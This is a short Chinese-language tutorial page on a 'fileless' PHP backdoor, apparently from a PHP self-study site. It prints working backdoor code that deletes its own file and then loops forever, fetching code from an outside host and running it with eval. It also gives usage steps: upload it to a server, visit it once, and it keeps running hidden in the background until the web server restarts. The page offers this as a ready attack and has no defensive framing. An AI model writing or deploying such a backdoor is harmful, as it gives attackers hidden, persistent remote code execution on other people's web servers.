PHP无文件后门 - 网站安全 - 自学php

PHP 无文件后门的意思是驻在 php 后台中的 shell。 

 

nonshell.php 

 

<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/eval.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?>

 

eval.txt 

 

file_put_contents('1.txt','hello world '.time());

使用方式 

 

将 nonshell.php 传到服务器之后访问一次他会自删除。但，依然会在后台执行 eval.txt 中的代码。 

 

停止执行 

 

删除或清空 eval.txt。 

 

缺点 

 

服务器或WEB容器一重启后门就没了。 

 

查看更多关于PHP无文件后门 - 网站安全 - 自学php的详细内容...